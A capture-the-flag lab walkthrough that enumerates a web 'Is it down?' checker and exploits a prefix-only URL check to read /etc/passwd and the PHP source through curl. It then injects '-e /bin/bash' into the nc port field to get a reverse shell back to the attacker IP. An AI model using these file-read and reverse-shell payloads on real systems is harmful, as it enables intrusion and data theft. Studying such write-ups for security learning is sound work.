# Victim IP

```
10.129.39.124
```

# Attacker IP

```
10.10.14.191
```

# Nmap

```
PORT      STATE    SERVICE         VERSION
22/tcp    open     ssh             OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 f6:cc:21:7c:ca:da:ed:34:fd:04:ef:e6:f9:4c:dd:f8 (ECDSA)
|_  256 fa:06:1f:f4:bf:8c:e3:b0:c8:40:21:0d:57:06:dd:11 (ED25519)
80/tcp    open     http            Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Is it down or just me?
|_http-server-header: Apache/2.4.52 (Ubuntu)
3190/tcp  filtered csvr-proxy
3329/tcp  filtered hp-device-disc
4285/tcp  filtered vrml-multi-use
4680/tcp  filtered mgemanagement
4967/tcp  filtered unknown
6336/tcp  filtered unknown
7753/tcp  filtered unknown
8999/tcp  filtered bctp
10362/tcp filtered unknown
11051/tcp filtered unknown
11600/tcp filtered tempest-port
11903/tcp filtered unknown
12708/tcp filtered unknown
13199/tcp filtered unknown
15078/tcp filtered unknown
16140/tcp filtered unknown
17153/tcp filtered unknown
17609/tcp filtered unknown
25119/tcp filtered unknown
34475/tcp filtered unknown
35375/tcp filtered unknown
39696/tcp filtered unknown
40259/tcp filtered unknown
41464/tcp filtered unknown
44320/tcp filtered unknown
46811/tcp filtered unknown
49334/tcp filtered unknown
51690/tcp filtered unknown
54014/tcp filtered unknown
54250/tcp filtered unknown
59865/tcp filtered unknown
61349/tcp filtered unknown
62024/tcp filtered unknown
63662/tcp filtered unknown
65417/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 590.06 seconds
           Raw packets sent: 72586 (3.194MB) | Rcvd: 70925 (2.889MB)
```

Only SSH and HTTP are open; the long tail of filtered ports is noise from the scan. The box has no outbound internet access, but the "Is it down?" form on port 80 will fetch `http://` and `https://` addresses for us, so there is an SSRF primitive. Working the request through Burp Suite. Tried other schemes such as `file://` on their own, but the page returns an error (only http/https are accepted, as the source confirms later). Next: gobuster for directory / file enumeration.

# Gobuster

```
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.39.124
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 319] [--> http://10.129.39.124/javascript/]
/index.php            (Status: 200) [Size: 739]
/server-status        (Status: 403) [Size: 278]
Progress: 47937 / 60000 (79.89%)[ERROR] parse "http://10.129.39.124/error\x1f_log": net/url: invalid control character in URL
[ERROR] parse "http://10.129.39.124/error\x1f_log.php": net/url: invalid control character in URL
Progress: 59998 / 60000 (100.00%)
===============================================================
Finished
===============================================================
```

Nothing of interest from gobuster.

The scheme check only looks at the start of the URL. Sending

```
http://+file%3a///etc/passwd
```

as the `url` parameter in the POST request (the `+` decodes to a space) returns the contents of `/etc/passwd`, where we find the user `aleks` with login shell `/bin/bash`.

The same trick discloses the application's own source: requesting `http:// file:///var/www/html/index.php` (URL-encoded, of course) returns `index.php`. The output is passed through `htmlspecialchars()`, so after HTML-decoding it we get this:

```php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Is it down or just me?</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <header>
        <img src="/logo.png" alt="Logo">
        <h2>Is it down or just me?</h2>
    </header>
    <div class="container">
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
    echo '<h1>Is the port refused, or is it just you?</h1>
    <form id="urlForm" action="index.php?expertmode=tcp" method="POST">
        <input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
        <input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
        <button type="submit">Is it refused?</button>
    </form>';
} else {
    echo '<h1>Is that website down, or is it just you?</h1>
    <form id="urlForm" action="index.php" method="POST">
        <input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
        <button type="submit">Is it down?</button>
    </form>';
}
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
    $ip = trim($_POST['ip']);
    $valid_ip = filter_var($ip, FILTER_VALIDATE_IP);
    $port = trim($_POST['port']);
    $port_int = intval($port);
    $valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
    if ( $valid_ip && $valid_port ) {
        $rc = 255;
        $output = '';
        $ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");
        exec($ec . " 2>&1",$output,$rc);
        echo '<div class="output" id="outputSection">';
        if ( $rc === 0 ) {
            echo "<font size=+1>It is up. It's just you! 😝</font><br><br>";
            echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
        } else {
            echo "<font size=+1>It is down for everyone! 😔</font><br><br>";
            echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
        }
    } else {
        echo '<div class="output" id="outputSection">';
        echo '<font color=red size=+1>Please specify a correct IP and a port between 1 and 65535.</font>';
    }
} elseif (isset($_POST['url'])) {
    $url = trim($_POST['url']);
    if ( preg_match('|^https?://|',$url) ) {
        $rc = 255;
        $output = '';
        $ec = escapeshellcmd("/usr/bin/curl -s $url");
        exec($ec . " 2>&1",$output,$rc);
        echo '<div class="output" id="outputSection">';
        if ( $rc === 0 ) {
            echo "<font size=+1>It is up. It's just you! 😝</font><br><br>";
            echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
        } else {
            echo "<font size=+1>It is down for everyone! 😔</font><br><br>";
        }
    } else {
        echo '<div class="output" id="outputSection">';
        echo '<font color=red size=+1>Only protocols http or https allowed.</font>';
    }
}
?>
        </div>
    </div>
    <footer>© 2024 isitdownorjustme LLC</footer>
</body>
</html>
```

This explains the `/etc/passwd` trick: `preg_match('|^https?://|', $url)` only checks the prefix, and `escapeshellcmd()` escapes shell metacharacters but not spaces, so `curl -s http:// file:///etc/passwd` runs with two URL arguments and the second one is a `file://` read.

The first block of PHP is the interesting part:

```php
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
    echo '<h1>Is the port refused, or is it just you?</h1>
    <form id="urlForm" action="index.php?expertmode=tcp" method="POST">
        <input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
        <input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
        <button type="submit">Is it refused?</button>
    </form>';
} else {
    echo '<h1>Is that website down, or is it just you?</h1>
    <form id="urlForm" action="index.php" method="POST">
        <input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
        <button type="submit">Is it down?</button>
    </form>';
}
```

It stands out because it looks for a GET parameter `expertmode=tcp` and only then shows a second, unlinked form that takes an IP and a port and runs `/usr/bin/nc -vz $ip $port`. The port is validated with `intval()` plus `FILTER_VALIDATE_INT`, but the command is built from the raw `$port`, not `$port_int`, so `intval("1337 -e /bin/bash")` is `1337` and passes while the rest of the string survives into the command. `escapeshellcmd()` does not touch the spaces or the `-`, so the extra tokens become arguments to `nc`. The `ip` field has to pass `FILTER_VALIDATE_IP`, so the injection goes into `port`. Posting this to `index.php?expertmode=tcp` with a listener on 1337 gives a reverse shell:

```
ip=10.10.14.191&port=1337 -e /bin/bash
```